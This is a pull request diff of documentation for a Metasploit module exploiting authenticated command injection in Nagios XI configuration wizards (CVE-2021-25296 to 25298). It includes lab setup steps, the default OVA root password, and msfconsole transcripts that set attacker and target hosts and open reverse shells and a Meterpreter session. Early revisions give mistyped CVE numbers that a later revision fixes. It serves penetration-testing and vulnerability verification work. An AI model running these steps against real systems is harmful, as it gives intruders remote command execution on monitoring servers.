### PR TITLE
Add NagiosXI authenticated RCE (CVE-2021-25296, CVE-2021-25297,CVE-2021-25298) exploit module

### DIFF
--- a/documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
@@ -1,0 +1,44 @@
+## Vulnerable Application
+This module exploits CVE-2021-25926, CVE-2021-25927, or CVE-2021-25928, OS command injection vulnerabilities in `/nagiosxi/config/monitoringwizard.php` that enables an authenticated user to achieve remote code execution on NagiosXI 5.7.5. There are two vulnerable parameters, and either can be used to achieve code execution.
+
+The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate to the target and
+obtain the Nagios XI version number, which is then used to check if the target is version 5.7.5 and therefore vulnerable.
+
+An OVA with the vulnerable NagiosXI application can be downloaded from Nagios [here](https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.7.5-64.ova).
+
+
+## Verification Steps
+
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/nagios_xi_configwizards_authenticated_rce`
+- [ ] `set RHOST TARGET_IP`
+- [ ] `set USERNAME USER`
+- [ ] `set PASSWORD PASSWORD`
+- [ ] `set TARGET_URL_PARAM plugin_output_len`
+- [ ] `run`
+
+
+## Options
+
+### USERNAME
+A valid NagiosXI username, which can be for an administrator or regular user.
+
+### PASSWORD
+The password for the provided NagiosXI username.
+
+### TARGET_URL_PARAM
+The vulnerable URL parameter to inject payloads into. Defaults to plugin_output_len with ip_address as another option.
+
+## Scenarios
+
+```
+
+```
+
+## Version and OS
+Tested Nagios XI 5.7.5 on CentOS using their provided OVA
+
+## References
+- https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md
+- https://nvd.nist.gov/vuln/detail/CVE-2021-25296

--- a/documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
@@ -20,7 +20,8 @@ Note: The module can attempt to complete the configuration steps after NagiosXI 
     2. To download other vulnerable versions, replace the version number in the URL with the desired version.
 2. Configure the NagiosXI installation
     1. The OVA has NagiosXI running on startup. Launch the VM and visit the VM's IP in a browser.
-    2. Configure the `nagiosadmin` user's password and whether you'd like to force HTTPS.
+    2. Go through defaults on the install. When you get to Admin Account Settings, configure the `nagiosadmin`
+    user's password and whether you'd like to force HTTPS.
     3. Login as the `nagiosadmin` user and accept the license agreement when prompted.
 
 #### Manual Install on Linux
@@ -38,8 +39,17 @@ on newer distributions.
     3. `./fullinstall`
 3. Configure the NagiosXI installation
     1. Visit the installed NagiosXI application in a web browser.
-    2. Configure the `nagiosadmin` user's password and whether you'd like to force HTTPS.
+    2. Go through defaults on the install. When you get to Admin Account Settings, configure the `nagiosadmin`
+    user's password and whether you'd like to force HTTPS.
     3. Login as the `nagiosadmin` user and accept the license agreement when prompted.
+
+### Troubleshooting Installation
+- NagiosXI doesn't show it's ip address
+  - Login as the `root` user with `nagiosxi` as the password, and run `ip a` to get the IP
+  - Ensure it's on a network accessible from your attacking machine (e.g. Nat network instead of Bridged)
+- NagiosXI fails when attempting to login manually with an "NSP Sorry Dave" message
+  - The NagiosXI installation is likely out of sync with its date/time.
+  - Set it manually with `timedatectl set-ntp false` and `timedatectl set-time 2023-02-06 17:34:00` but with the actual time and date
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
@@ -49,7 +49,7 @@ on newer distributions.
   - Ensure it's on a network accessible from your attacking machine (e.g. Nat network instead of Bridged)
 - NagiosXI fails when attempting to login manually with an "NSP Sorry Dave" message
   - The NagiosXI installation is likely out of sync with its date/time.
-  - Set it manually with `timedatectl set-ntp false` and `timedatectl set-time 2023-02-06 17:34:00` but with the actual time and date
+  - Set it manually with `timedatectl set-ntp false` and `timedatectl set-time '2023-02-06 17:34:00'` but with the actual time and date
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
@@ -1,18 +1,45 @@
 ## Vulnerable Application
-This module exploits CVE-2021-25926, CVE-2021-25927, or CVE-2021-25928, OS command injection vulnerabilities
+This module exploits CVE-2021-25926, CVE-2021-25927, and CVE-2021-25928: OS command injection vulnerabilities
 in `/nagiosxi/config/monitoringwizard.php` that enable an authenticated user to achieve remote code execution
-on NagiosXI 5.7.5. There are three vulnerable configuration wizards (windowswmi, switch, digitalocean) that 
-use two vulnerable URL parameters (ip_address, plugin_output_len). The windowswmi uses the plugin_output_len,
-while switch and digitalocean use ip_address.
+on NagiosXI from versions 5.5.6 to 5.7.5 as the `apache` user. There are three vulnerable configuration wizards
+(`windowswmi`, `switch`, `cloud-vm`) that use two vulnerable URL parameters
+(`ip_address`, `plugin_output_len`). The `windowswmi` configuration wizard uses the
+`plugin_output_len` parameter, while `switch` and `cloud-vm` use the `ip_address` parameter.
 
 The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate
-to the target and obtain the Nagios XI version number, which is then used to check if the target is version 5.7.5 and therefore vulnerable.
+to the target and obtain the version of Nagios XI installed, which is then used to check if the target is running a version
+of NagiosXI between versions 5.5.6 and 5.7.5.
 
-An OVA with the vulnerable NagiosXI application can be downloaded from
-Nagios [here](https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.7.5-64.ova).
-The OVA has NagiosXI running on startup, but must be fully installed and have the license agreement accepted.
-The module can attempt to do this for you, but can also be done manually by visiting the target's IP and configuring
-it manually.
+### Installation Steps
+Note: The module can attempt to complete the configuration steps after NagiosXI has been installed.
+
+#### Pre-installed OVA
+1. Download an OVA with NagiosXI installed
+    1. An OVA with a vulnerable NagiosXI 5.7.5 application can be downloaded from 
+    Nagios [here](https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.7.5-64.ova).
+    2. To download other vulnerable versions, replace the version number in the URL with the desired version.
+2. Configure the NagiosXI installation
+    1. The OVA has NagiosXI running on startup. Launch the VM and visit the VM's IP in a browser.
+    2. Configure the `nagiosadmin` user's password and whether you'd like to force HTTPS.
+    3. Login as the `nagiosadmin` user and accept the license agreement when prompted.
+
+#### Manual Install on Linux
+Note: NagiosXI can only be installed on specific operating systems (RHEL, CentOS, Oracle Linux, Debian, Ubuntu).
+Supported version numbers can be found in the installation guide
+[here](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf). Older versions of
+NagiosXI might require older versions of the operating systems mentioned. Consult the specific version's documentation if errors occur
+on newer distributions.
+
+1. Download NagiosXI
+    1. Choose a version between 5.5.6 and 5.7.5 from [here](https://www.nagios.com/downloads/nagios-xi/older-releases/)
+2. Install NagiosXI with the following commands
+    1. `tar xzf xi-5.7.5.gz`
+    2. `cd nagiosxi`
+    3. `./fullinstall`
+3. Configure the NagiosXI installation
+    1. Visit the installed NagiosXI application in a web browser.
+    2. Configure the `nagiosadmin` user's password and whether you'd like to force HTTPS.
+    3. Login as the `nagiosadmin` user and accept the license agreement when prompted.
 
 ## Verification Steps
 
@@ -23,7 +50,7 @@ it manually.
 - [ ] `set SSL true`
 - [ ] `set USERNAME USER`
 - [ ] `set PASSWORD PASSWORD`
-- [ ] `set TARGET_URL_PARAM plugin_output_len`
+- [ ] `set TARGET_CVE CVE-2021-25296`
 - [ ] `set LHOST YOUR_IP`
 - [ ] `set LPORT YOUR_LISTENING_PORT`
 - [ ] `run`
@@ -36,20 +63,24 @@ A valid NagiosXI username, which can be for an administrator or regular user.
 ### PASSWORD
 The password for the provided NagiosXI username.
 
-### TARGET_CONFIG_WIZARD
-The vulnerable configuration wizard to target. Each target corresponds to a specific CVE:
-- windowswmi : CVE-2021-25296
-- switch : CVE-2021-25297
-- digitalocean : CVE-2021-25298
+### TARGET_CVE
+The CVE to target. Each CVE corresponds to a specific target:
+- CVE-2021-25296: `windowswmi` configuration wizard RCE via the `plugin_output_len` URL parameter
+- CVE-2021-25297: `switch` configuration wizard RCE via the `ip_address` URL parameter
+- CVE-2021-25298: `cloud-vm` configuration wizard RCE via the `ip_address` URL parameter.
+
+Note that CVE-2021-25298 is in the `cloud-vm` configuration wizard but we set the `wizard`
+URL parameter value to `digitalocean` in order to make sure we use this wizard; there are
+potentially other values that could be used here.
 
 ## Scenarios
 
-### CentOS7 running NagiosXI 5.7.5 (Official OVA)
+### CentOS7 running NagiosXI 5.5.6 to 5.7.5 (Official OVA)
 ```
 msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
 [*] Using configured payload cmd/unix/reverse_perl_ssl
-msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOSTS 192.168.104.7
-RHOSTS => 192.168.104.7
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOSTS 192.168.104.17
+RHOSTS => 192.168.104.17
 msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RPORT 443
 RPORT => 443
 msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set SSL true
@@ -59,18 +90,18 @@ msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWOR
 PASSWORD => nagiosadmin
 msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.104.2
 LHOST => 192.168.104.2
-msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LPORT 1234
-LPORT => 1234
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LPORT 8443
+LPORT => 8443
 msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > run
 
-[*] Started reverse SSL handler on 192.168.104.2:1234 
+[*] Started reverse SSL handler on 192.168.104.2:8443 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Attempting to authenticate to Nagios XI...
-[+] Successfully authenticated to Nagios XI
-[*] Target is Nagios XI with version 5.7.5
+[+] Successfully authenticated to Nagios XI.
+[*] Target is Nagios XI with version 5.7.5.
 [+] The target appears to be vulnerable.
-[*] Executing the payload
-[*] Command shell session 1 opened (192.168.104.2:1234 -> 192.168.104.7:50884 ) at 2023-01-18 09:52:59 -0500
+[*] Sending the payload...
+[*] Command shell session 1 opened (192.168.104.2:8443 -> 192.168.104.17:56742) at 2023-02-06 13:35:49 -0500
 
 id
 uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)

--- a/documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
@@ -1,10 +1,12 @@
 ## Vulnerable Application
-This module exploits CVE-2021-25926, CVE-2021-25927, and CVE-2021-25928: OS command injection vulnerabilities
+This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298: OS command injection vulnerabilities
 in `/nagiosxi/config/monitoringwizard.php` that enable an authenticated user to achieve remote code execution
 on NagiosXI from versions 5.5.6 to 5.7.5 as the `apache` user. There are three vulnerable configuration wizards
-(`windowswmi`, `switch`, `cloud-vm`) that use two vulnerable URL parameters
-(`ip_address`, `plugin_output_len`). The `windowswmi` configuration wizard uses the
-`plugin_output_len` parameter, while `switch` and `cloud-vm` use the `ip_address` parameter.
+(`windowswmi`, `switch`, `cloud-vm`). The `windowswmi` configuration wizard is vulnerable
+to CVE-2021-25296 via command injection in the `plugin_output_len` parameter. `switch` and
+`cloud-vm` are vulnerable to CVE-2021-25297 and CVE-2021-25298 respectively, and use the
+`ip_address` parameter, though on version 5.5.7 and prior of NagiosXI this parameter was
+named `address`.
 
 The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate
 to the target and obtain the version of Nagios XI installed, which is then used to check if the target is running a version
@@ -15,7 +17,7 @@ Note: The module can attempt to complete the configuration steps after NagiosXI 
 
 #### Pre-installed OVA
 1. Download an OVA with NagiosXI installed
-    1. An OVA with a vulnerable NagiosXI 5.7.5 application can be downloaded from 
+    1. An OVA with a vulnerable NagiosXI 5.7.5 application can be downloaded from
     Nagios [here](https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.7.5-64.ova).
     2. To download other vulnerable versions, replace the version number in the URL with the desired version.
 2. Configure the NagiosXI installation
@@ -46,13 +48,12 @@ on newer distributions.
 ### Troubleshooting Installation
 - NagiosXI doesn't show it's ip address
   - Login as the `root` user with `nagiosxi` as the password, and run `ip a` to get the IP
-  - Ensure it's on a network accessible from your attacking machine (e.g. Nat network instead of Bridged)
+  - Ensure it's on a network accessible from your attacking machine (e.g. NAT network instead of Bridged)
 - NagiosXI fails when attempting to login manually with an "NSP Sorry Dave" message
   - The NagiosXI installation is likely out of sync with its date/time.
   - Set it manually with `timedatectl set-ntp false` and `timedatectl set-time '2023-02-06 17:34:00'` but with the actual time and date
 
 ## Verification Steps
-
 - [ ] Start `msfconsole`
 - [ ] `use exploit/linux/http/nagios_xi_configwizards_authenticated_rce`
 - [ ] `set RHOSTS TARGET_IP`
@@ -76,8 +77,10 @@ The password for the provided NagiosXI username.
 ### TARGET_CVE
 The CVE to target. Each CVE corresponds to a specific target:
 - CVE-2021-25296: `windowswmi` configuration wizard RCE via the `plugin_output_len` URL parameter
-- CVE-2021-25297: `switch` configuration wizard RCE via the `ip_address` URL parameter
+- CVE-2021-25297: `switch` configuration wizard RCE via the `ip_address` URL parameter.
+  Note that on versions 5.5.7 and prior this parameter is named `address` instead.
 - CVE-2021-25298: `cloud-vm` configuration wizard RCE via the `ip_address` URL parameter.
+  Note that on versions 5.5.7 and prior this parameter is named `address` instead.
 
 Note that CVE-2021-25298 is in the `cloud-vm` configuration wizard but we set the `wizard`
 URL parameter value to `digitalocean` in order to make sure we use this wizard; there are
@@ -85,34 +88,284 @@ potentially other values that could be used here.
 
 ## Scenarios
 
-### CentOS7 running NagiosXI 5.5.6 to 5.7.5 (Official OVA)
+### CentOS7 Running NagiosXI 5.7.5 (Official OVA) - CVE-2021-25296
 ```
 msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
 [*] Using configured payload cmd/unix/reverse_perl_ssl
-msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOSTS 192.168.104.17
-RHOSTS => 192.168.104.17
-msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RPORT 443
-RPORT => 443
-msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set SSL true
-[!] Changing the SSL option's value may require changing RPORT!
-SSL => true
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.132
+RHOST => 192.168.153.132
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
+LHOST => 192.168.153.128
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FINISH_INSTALL true
+FINISH_INSTALL => true
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set USERNAME nagiosadmin
+USERNAME => nagiosadmin
 msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
 PASSWORD => nagiosadmin
-msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.104.2
-LHOST => 192.168.104.2
-msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LPORT 8443
-LPORT => 8443
-msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > run
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.132
+RHOST => 192.168.153.132
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
+LHOST => 192.168.153.128
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FIN
+set FINGERPRINTCHECK  set FINISH_INSTALL
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FINISH_INSTALL true
+FINISH_INSTALL => true
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
 
-[*] Started reverse SSL handler on 192.168.104.2:8443 
+Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FINISH_INSTALL  true             no        If the Nagios XI installation has not been completed,
+                                              try to do so. This includes signing the license agreem
+                                              ent.
+   PASSWORD        nagiosadmin      no        Password to authenticate with
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port
+                                              ][...]
+   RHOSTS          192.168.153.132  yes       The target host(s), see https://github.com/rapid7/meta
+                                              sploit-framework/wiki/Using-Metasploit
+   RPORT           80               yes       The target port (TCP)
+   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This
+                                               must be an address on the local machine or 0.0.0.0 to
+                                               listen on all addresses.
+   SRVPORT         8080             yes       The local port to listen on.
+   SSL             false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly
+                                              generated)
+   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
+   TARGET_CVE      CVE-2021-25296   yes       CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE
+                                              -2021-25298)
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   USERNAME        nagiosadmin      no        Username to authenticate with
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_perl_ssl):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.153.128  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   CMD
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
+
+[*] Started reverse SSL handler on 192.168.153.128:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Attempting to authenticate to Nagios XI...
+[!] The target seems to be a Nagios XI application that has not been fully installed yet.
+[*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
+[*] Attempting to authenticate to Nagios XI...
+[!] The Nagios XI license agreement has not yet been signed on the target.
+[*] Attempting to sign the Nagios XI license agreement...
+[*] License agreement signed. The module will wait for 5 seconds and retry the login.
+[*] Attempting to authenticate to Nagios XI...
+[+] Successfully authenticated to Nagios XI.
+[*] Target is Nagios XI with version 5.7.5.
+[+] The target appears to be vulnerable.
+[*] Sending the payload...
+[*] Command shell session 1 opened (192.168.153.128:4444 -> 192.168.153.132:56222) at 2023-02-07 11:33:53 -0600
+
+id
+uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
+pwd
+/usr/local/nagiosxi/html/config
+uname -a
+Linux localhost.localdomain 3.10.0-1160.2.2.el7.x86_64 #1 SMP Tue Oct 20 16:53:08 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+### CentOS7 Running NagiosXI 5.7.5 (Official OVA) - CVE-2021-25297
+```
+msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
+[*] Using configured payload cmd/unix/reverse_perl_ssl
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.132
+RHOST => 192.168.153.132
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
+LHOST => 192.168.153.128
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set USERNAME nagiosadmin
+USERNAME => nagiosadmin
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
+PASSWORD => nagiosadmin
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
+
+Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed,
+                                              try to do so. This includes signing the license agreem
+                                              ent.
+   PASSWORD        nagiosadmin      no        Password to authenticate with
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port
+                                              ][...]
+   RHOSTS          192.168.153.132  yes       The target host(s), see https://github.com/rapid7/meta
+                                              sploit-framework/wiki/Using-Metasploit
+   RPORT           80               yes       The target port (TCP)
+   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This
+                                               must be an address on the local machine or 0.0.0.0 to
+                                               listen on all addresses.
+   SRVPORT         8080             yes       The local port to listen on.
+   SSL             false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly
+                                              generated)
+   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
+   TARGET_CVE      CVE-2021-25296   yes       CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE
+                                              -2021-25298)
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   USERNAME        nagiosadmin      no        Username to authenticate with
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_perl_ssl):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.153.128  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   CMD
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET_CVE CVE-2021-25297
+TARGET_CVE => CVE-2021-25297
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
+
+[*] Started reverse SSL handler on 192.168.153.128:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Attempting to authenticate to Nagios XI...
 [+] Successfully authenticated to Nagios XI.
 [*] Target is Nagios XI with version 5.7.5.
 [+] The target appears to be vulnerable.
 [*] Sending the payload...
-[*] Command shell session 1 opened (192.168.104.2:8443 -> 192.168.104.17:56742) at 2023-02-06 13:35:49 -0500
+[*] Command shell session 1 opened (192.168.153.128:4444 -> 192.168.153.132:56322) at 2023-02-07 11:44:00 -0600
 
 id
 uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
+whoami
+apache
+uname -a
+Linux localhost.localdomain 3.10.0-1160.2.2.el7.x86_64 #1 SMP Tue Oct 20 16:53:08 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+### CentOS7 Running NagiosXI 5.7.5 (Official OVA) - CVE-2021-25298
+```
+msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
+[*] Using configured payload cmd/unix/reverse_perl_ssl
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set USERNAME nagiosadmin
+USERNAME => nagiosadmin
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
+PASSWORD => nagiosadmin
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET_CVE CVE-2021-25298
+TARGET_CVE => CVE-2021-25298
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
+LHOST => 192.168.153.128
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.132
+RHOST => 192.168.153.132
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET Linux\ (x64)
+TARGET => Linux (x64)
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
+
+Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed,
+                                              try to do so. This includes signing the license agreem
+                                              ent.
+   PASSWORD        nagiosadmin      no        Password to authenticate with
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port
+                                              ][...]
+   RHOSTS          192.168.153.132  yes       The target host(s), see https://github.com/rapid7/meta
+                                              sploit-framework/wiki/Using-Metasploit
+   RPORT           80               yes       The target port (TCP)
+   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This
+                                               must be an address on the local machine or 0.0.0.0 to
+                                               listen on all addresses.
+   SRVPORT         8080             yes       The local port to listen on.
+   SSL             false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly
+                                              generated)
+   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
+   TARGET_CVE      CVE-2021-25298   yes       CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE
+                                              -2021-25298)
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   USERNAME        nagiosadmin      no        Username to authenticate with
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.153.128  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux (x64)
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LPORT 9912
+LPORT => 9912
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FINISH_INSTALL true
+FINISH_INSTALL => true
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.153.128:9912
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Attempting to authenticate to Nagios XI...
+[!] The target seems to be a Nagios XI application that has not been fully installed yet.
+[*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
+[*] Attempting to authenticate to Nagios XI...
+[!] The Nagios XI license agreement has not yet been signed on the target.
+[*] Attempting to sign the Nagios XI license agreement...
+[*] License agreement signed. The module will wait for 5 seconds and retry the login.
+[*] Attempting to authenticate to Nagios XI...
+[+] Successfully authenticated to Nagios XI.
+[*] Target is Nagios XI with version 5.7.5.
+[+] The target appears to be vulnerable.
+[*] Sending the payload...
+[*] Sending stage (3045348 bytes) to 192.168.153.132
+[*] Meterpreter session 1 opened (192.168.153.128:9912 -> 192.168.153.132:32878) at 2023-02-07 11:48:50 -0600
+
+[*] Command Stager progress - 100.00% done (833/833 bytes)
+
+meterpreter >
+meterpreter > getuid
+Server username: apache
+meterpreter > getprivs
+[-] The "getprivs" command is not supported by this Meterpreter type (x64/linux)
+meterpreter > sysinfo
+Computer     : localhost.localdomain
+OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.2.2.el7.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > pwd
+/usr/local/nagiosxi/html/config
+meterpreter >
 ```

--- a/documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
@@ -1,5 +1,5 @@
 ## Vulnerable Application
-This module exploits CVE-2021-25926, CVE-2021-25927, or CVE-2021-25928, OS command injection vulnerabilities in `/nagiosxi/config/monitoringwizard.php` that enables an authenticated user to achieve remote code execution on NagiosXI 5.7.5. There are two vulnerable parameters, and either can be used to achieve code execution.
+This module exploits CVE-2021-25926, CVE-2021-25927, or CVE-2021-25928, OS command injection vulnerabilities in `/nagiosxi/config/monitoringwizard.php` that enables an authenticated user to achieve remote code execution on NagiosXI 5.7.5. There are two vulnerable parameters (ip_address, plugin_output_len), and either can be used to achieve code execution.
 
 The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate to the target and
 obtain the Nagios XI version number, which is then used to check if the target is version 5.7.5 and therefore vulnerable.
@@ -12,10 +12,14 @@ An OVA with the vulnerable NagiosXI application can be downloaded from Nagios [h
 
 - [ ] Start `msfconsole`
 - [ ] `use exploit/linux/http/nagios_xi_configwizards_authenticated_rce`
-- [ ] `set RHOST TARGET_IP`
+- [ ] `set RHOSTS TARGET_IP`
+- [ ] `set RPORT 443`
+- [ ] `set SSL true`
 - [ ] `set USERNAME USER`
 - [ ] `set PASSWORD PASSWORD`
 - [ ] `set TARGET_URL_PARAM plugin_output_len`
+- [ ] `set LHOST YOUR_IP`
+- [ ] `set LPORT YOUR_LISTENING_PORT`
 - [ ] `run`
 
 
@@ -31,9 +35,36 @@ The password for the provided NagiosXI username.
 The vulnerable URL parameter to inject payloads into. Defaults to plugin_output_len with ip_address as another option.
 
 ## Scenarios
-
+Target is CentOS running NagiosXI 5.7.5 (Official OVA)
 ```
+msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
+[*] Using configured payload cmd/unix/reverse_perl_ssl
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOSTS 192.168.104.7
+RHOSTS => 192.168.104.7
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RPORT 443
+RPORT => 443
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set SSL true
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => true
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
+PASSWORD => nagiosadmin
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.104.2
+LHOST => 192.168.104.2
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LPORT 1234
+LPORT => 1234
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > run
 
